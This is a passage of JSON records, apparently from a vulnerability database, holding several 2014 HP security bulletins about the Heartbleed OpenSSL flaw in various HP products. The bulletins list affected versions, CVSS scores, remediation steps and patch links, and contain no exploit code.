To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNaq/0ACgkQ4B86/C0qfVmBoACgmzkyr8qMTcs0ADEi4tGXug2j\r\nk4gAoPlR4SOE2FAQjkIMjCpmnAJBKfqj\r\n=LRhJ\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU02994 rev.3 - HP BladeSystem c-Class Onboard Administrator (OA) running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30499", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30499", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260353\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260353\r\nVersion: 1\r\n\r\nHPSBMU03019 rev.1 - HP Software UCMDB Browser and Configuration Manager\r\nrunning OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-21\r\nLast Updated: 2014-04-21\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Software UCMDB\r\nBrowser and Configuration Manager running OpenSSL. The Heartbleed\r\nvulnerability was detected in specific OpenSSL versions. OpenSSL is a 3rd\r\nparty product that is embedded with some of HP Software products. This\r\nbulletin objective is to notify HP Software customers about products affected\r\nby the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101530)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nUCMDB Browser (with Tomcat embedded install bits) v.1x, v.2.x, v3.x\r\nConfiguration manager v.9.1x, v.9.2x, 9.3x, 10.01, 10.10 (including all\r\npatches)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNote: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00863916\r\n\r\nHP recommends following UCMDB Browser and Configuration Manager guidelines\r\nincluding the following action items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 21 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNWawYACgkQ4B86/C0qfVmF5wCgmid+aSKir9WSm/VbldCfI1fz\r\njsUAoMPwYqI3xNomVEElTXzeceNKT7FJ\r\n=or+Z\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03019 rev.1 - HP Software UCMDB Browser and Configuration Manager running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30509", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30509", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04239372\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04239372\r\nVersion: 1\r\n\r\nHPSBMU02998 rev.1 - HP System Management Homepage (SMH) running OpenSSL on\r\nLinux and Windows, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-13\r\nLast Updated: 2014-04-13\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP System\r\nManagement Homepage (SMH) running on Linux and Windows. This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101501\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\r\nv7.3.1 for Linux and Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP System Management Homepage (SMH). This bulletin will be\r\nrevised when the software updates are released.\r\n\r\nInformation and downloads for HP SMH can be found at the following location:\r\n\r\nhttp://h18013.www1.hp.com/products/servers/management/agents/index.html\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 13 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNK/UsACgkQ4B86/C0qfVnUpACgs06y+OxukBiWTHsJUzFVtUs8\r\naeYAn2YETGkjLUrH6Js44b/Lgl4J2nry\r\n=3CzH\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-04-20T00:00:00", "title": "[security bulletin] HPSBMU02998 rev.1 - HP System Management Homepage (SMH) running OpenSSL on Linux and Windows, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30477", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30477", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04240206\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04240206\r\nVersion: 1\r\n\r\nHPSBST03001 rev.1 - HP XP P9500 Disk Array running OpenSSL, Remote Disclosure\r\nof Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-15\r\nLast Updated: 2014-04-15\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP XP P9500 Disk\r\nArray running OpenSSL.This is the OpenSSL vulnerability known as "Heartbleed"\r\nwhich could be exploited remotely resulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101506\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP XP P9500 Disk Array OSS 70-06-00/00 and 70-06-01/00 when running Apache\r\n2.2.24\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP XP P9500 Disk Array. This bulletin will be revised when the\r\nsoftware updates are released.\r\n\r\nThe two versions of Apache available in OSS 70-06-00/00 and 70-06-01/00 are:\r\n\r\nApache 2.2.10 (with OpenSSL 0.9.8o) which is not impacted by CVE-2014-0160\r\nApache 2.2.24 (with OpenSSL 1.0.1e) which is impacted by CVE-2014-0160\r\n\r\nUntil a new version is available, keep the SVP(s) on an array on the earlier\r\nversion of Apache available from the OSS image (version 2.2.10)\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 15 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNNOSEACgkQ4B86/C0qfVl7IwCcCAFossT9cI/G1w8Zjt125fWa\r\nwwQAnR+wDpUBjcU/REah/pNV80/+VNeR\r\n=Do3J\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-04-20T00:00:00", "title": "[security bulletin] HPSBST03001 rev.1 - HP XP P9500 Disk Array running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30478", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30478", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04262472\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04262472\r\nVersion: 1\r\n\r\nHPSBMU03020 rev.1 - HP Version Control Agent (VCA) and Version Control\r\nRepository Manager (VCRM) running OpenSSL on Linux and Windows, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-24\r\nLast Updated: 2014-04-24\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Version\r\nControl Agent (VCA) and Version Control Repository Manager (VCRM) running\r\nOpenSSL on Linux and Windows. This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101531\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nHP Version Control Agent (VCA) v7.2.0, v7.2.1, v7.2.2, v7.3.0, and v7.3.1 for\r\nWindows\r\nHP Version Control Agent (VCA) v7.2.2, v7.3.0, and v7.3.1 for Linux\r\nHP Version Control Repository Manager (VCRM) v7.2.0, v7.2.1, v7.2.2, v7.3.0,\r\nand v7.3.1 for Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nsoftware versions of HP Version Control Agent (VCA) and Version Control\r\nRepository Manager (VCRM). This bulletin will be revised when the software\r\nupdates are released.\r\n\r\nUntil the software updates are available, HP recommends the following\r\nmitigations and workarounds:\r\n\r\nDisable the VCA service name "HP Version Control Agent" on any vulnerable\r\nWindows or Linux server. Disable the VCRM service name "HP Version Control\r\nRepository Manager" on any vulnerable server. Typically, the VCRM is\r\ninstalled on a HP Systems Insight Manager server, but may be installed on\r\nanother server.\r\nIf bulk software or firmware updates are required, use an unaffected or\r\npatched version of HP Smart Update Manager (HP SUM) to do single or batch\r\nupdates.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 24 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNZRKMACgkQ4B86/C0qfVnRjACcDCv9Sl93QAssH48SvbycVxCr\r\nfdUAn20/zGmeeTJR2L3N6qzFVQ0PXNAh\r\n=JCF2\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03020 rev.1 - HP Version Control Agent (VCA) and Version Control Repository Manager (VCRM) running OpenSSL on Linux and Windows, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30502", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30502", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04264271\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04264271\r\nVersion: 1\r\n\r\nHPSBMU03023 rev.1 - HP BladeSystem c-Class Virtual Connect Support Utility\r\n(VCSU) running OpenSSL on Linux and Windows, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-25\r\nLast Updated: 2014-04-25\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP BladeSystem\r\nc-Class Virtual Connect Support Utility (VCSU) running OpenSSL on Linux and\r\nWindows. This is the OpenSSL vulnerability known as "Heartbleed" which could\r\nbe exploited remotely resulting in disclosure of information. The Virtual\r\nConnect firmware itself is not vulnerable to CVE-2014-0160 (Heartbleed),\r\nhowever, the installer component in versions 4.10 and 4.20 of Virtual Connect\r\ndoes have the vulnerability, and should be replaced with versions 4.10b or\r\n4.20b, or the latest version of Virtual Connect Support Utility referenced\r\nbelow. The VCSU vulnerability is only present during the firmware upgrade\r\nprocess.\r\n\r\nReferences: CVE-2014-0160, SSRT101535\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP BladeSystem c-Class Virtual Connect Support Utility (VCSU) 1.9.0 for Linux\r\nand Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available for HP BladeSystem\r\nc-Class Virtual Connect Support Utility (VCSU) for Linux and Windows:\r\n\r\nHP VCSU 1.9.1 for Linux:\r\n\r\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\r\ns/?sp4ts.oid=3201247&spf_p.tpst=swdMain&spf_p.prp_swdMain=wsrp-navigationalSt\r\nate%3Didx%253D%257CswItem%253DMTX_315720dcc692488599123352b4%257CswEnvOID%253\r\nD4048%257CitemLocale%253D%257CswLang%253D%257Cmode%253D%257Caction%253Ddriver\r\nDocument&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endC\r\nacheTok=com.vignette.cachetoken\r\n\r\nHP VCSU 1.9.1 for Windows:\r\n\r\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\r\ns/?sp4ts.oid=3201247&spf_p.tpst=swdMain&spf_p.prp_swdMain=wsrp-navigationalSt\r\nate%3Didx%253D%257CswItem%253DMTX_3b24f68469fb4090a82ea0f398%257CswEnvOID%253\r\nD4138%257CitemLocale%253D%257CswLang%253D%257Cmode%253D%257Caction%253Ddriver\r\nDocument&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endC\r\nacheTok=com.vignette.cachetoken\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 24 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNacsoACgkQ4B86/C0qfVlf/QCfdUuMhxr90Phgq1qg7mXztmPm\r\nHMsAoOo2nt8TGxHfihmmM08k7j/3RkR0\r\n=yiR8\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03023 rev.1 - HP BladeSystem c-Class Virtual Connect Support Utility (VCSU) running OpenSSL on Linux and Windows, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30501", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30501", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04272892\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04272892\r\nVersion: 1\r\n\r\nHPSBMU03033 rev.1 - HP Insight Control Software Components running OpenSSL,\r\nRemote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon 